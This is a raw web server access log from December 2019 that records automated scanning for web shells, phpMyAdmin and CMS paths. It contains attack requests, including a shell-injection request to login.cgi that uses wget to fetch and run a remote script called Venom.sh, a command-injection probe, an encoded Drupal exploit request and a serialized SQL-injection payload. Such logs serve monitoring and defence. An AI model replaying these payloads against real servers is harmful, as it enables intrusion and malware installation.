60.29.69.30 - - [02/Dec/2019:21:36:39 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:39 +0100] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:39 +0100] "GET /d7.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:40 +0100] "GET /rxr.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:40 +0100] "GET /1x.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:40 +0100] "GET /home.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:41 +0100] "GET /undx.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:41 +0100] "GET /spider.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:41 +0100] "GET /payload.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:41 +0100] "GET /composers.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:42 +0100] "GET /izom.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:42 +0100] "GET /composer.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:42 +0100] "GET /hue2.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:43 +0100] "GET /Drupal.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:43 +0100] "GET /lang.php?f=1 HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:43 +0100] "GET /izom.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:43 +0100] "GET /payload.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:44 +0100] "GET /new_license.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:44 +0100] "GET /images/!.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:44 +0100] "GET /images/vuln.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:44 +0100] "GET /hd.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:45 +0100] "GET /images/up.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:45 +0100] "GET /images/attari.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:45 +0100] "GET /images/jsspwneed.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:45 +0100] "GET /images/stories/cmd.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
212.91.246.72 - - [02/Dec/2019:21:36:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.29.69.30 - - [02/Dec/2019:21:36:46 +0100] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:46 +0100] "GET /up.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:46 +0100] "GET /laravel.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:47 +0100] "GET /huoshan.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:47 +0100] "GET /yu.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:47 +0100] "GET /floaw.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:47 +0100] "GET /ftmabc.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:48 +0100] "GET /doudou.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:48 +0100] "GET /mjx.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:48 +0100] "GET /xiaoxia.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:48 +0100] "GET /yuyang.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:49 +0100] "GET /zz.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:49 +0100] "GET /coonig.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:49 +0100] "GET /ak.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:50 +0100] "GET /baidoubi.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:50 +0100] "GET /hhhhhh.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:50 +0100] "GET /meijianxue.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:51 +0100] "GET /no1.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:51 +0100] "GET /python.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:51 +0100] "GET /woshimengmei.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:51 +0100] "GET /indea.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:52 +0100] "GET /taisui.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:52 +0100] "GET /xiaxia.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:52 +0100] "GET /kk.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:52 +0100] "GET /xsser.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:53 +0100] "GET /zzz.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:53 +0100] "GET /99.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:53 +0100] "GET /dp.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:53 +0100] "GET /hs.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:54 +0100] "GET /1ts.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:54 +0100] "GET /haiyan.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:54 +0100] "GET /phpdm.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:55 +0100] "GET /root.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:55 +0100] "GET /5678.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:55 +0100] "GET /root11.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:55 +0100] "GET /xiu.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
60.29.69.30 - - [02/Dec/2019:21:36:56 +0100] "POST /wuwu11.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
60.29.69.30 - - [02/Dec/2019:21:37:16 +0100] "POST /xw.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
60.29.69.30 - - [02/Dec/2019:21:37:41 +0100] "POST /xw1.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
212.91.246.72 - - [02/Dec/2019:21:37:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.29.69.30 - - [02/Dec/2019:21:38:05 +0100] "POST /9678.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
60.29.69.30 - - [02/Dec/2019:21:38:32 +0100] "POST /wc.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
212.91.246.72 - - [02/Dec/2019:21:38:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.29.69.30 - - [02/Dec/2019:21:38:56 +0100] "POST /xx.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
60.29.69.30 - - [02/Dec/2019:21:39:20 +0100] "POST /xx.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
60.29.69.30 - - [02/Dec/2019:21:39:44 +0100] "POST /s.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
212.91.246.72 - - [02/Dec/2019:21:39:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.29.69.30 - - [02/Dec/2019:21:40:09 +0100] "POST /w.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
60.29.69.30 - - [02/Dec/2019:21:40:33 +0100] "POST /sheep.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
212.91.246.72 - - [02/Dec/2019:21:40:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.29.69.30 - - [02/Dec/2019:21:40:56 +0100] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
60.29.69.30 - - [02/Dec/2019:21:40:56 +0100] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
60.29.69.30 - - [02/Dec/2019:21:40:57 +0100] "GET /weaver/bsh.servlet.BshServlet HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
60.29.69.30 - - [02/Dec/2019:21:40:57 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
60.29.69.30 - - [02/Dec/2019:21:40:57 +0100] "POST /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"
180.87.234.33 - - [02/Dec/2019:21:41:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
60.29.69.30 - - [02/Dec/2019:21:41:21 +0100] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
212.91.246.72 - - [02/Dec/2019:21:41:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.29.69.30 - - [02/Dec/2019:21:42:01 +0100] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
60.29.69.30 - - [02/Dec/2019:21:42:24 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
142.93.245.188 - - [02/Dec/2019:21:42:33 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://51.79.66.236/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [02/Dec/2019:21:42:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.29.69.30 - - [02/Dec/2019:21:42:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
60.29.69.30 - - [02/Dec/2019:21:43:12 +0100] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
60.29.69.30 - - [02/Dec/2019:21:43:37 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
212.91.246.72 - - [02/Dec/2019:21:43:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.29.69.30 - - [02/Dec/2019:21:44:01 +0100] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.1" 404 313 "554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:\"id\";s:3:\"'/*\";s:3:\"num\";s:141:\"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--\";s:4:\"name\";s:3:\"ads\";}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:01 +0100] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:01 +0100] "GET /phpmyadmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:02 +0100] "GET /phpMyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:02 +0100] "GET /pmd/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:02 +0100] "GET /pma/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:02 +0100] "GET /PMA/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:03 +0100] "GET /PMA2/index.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:03 +0100] "GET /pmamy/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:03 +0100] "GET /pmamy2/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:03 +0100] "GET /mysql/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:03 +0100] "GET /admin/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:04 +0100] "GET /db/index.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:04 +0100] "GET /dbadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:04 +0100] "GET /web/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:05 +0100] "GET /admin/pma/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:05 +0100] "GET /admin/PMA/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:05 +0100] "GET /admin/mysql/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:05 +0100] "GET /admin/mysql2/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:06 +0100] "GET /admin/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:06 +0100] "GET /admin/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:06 +0100] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
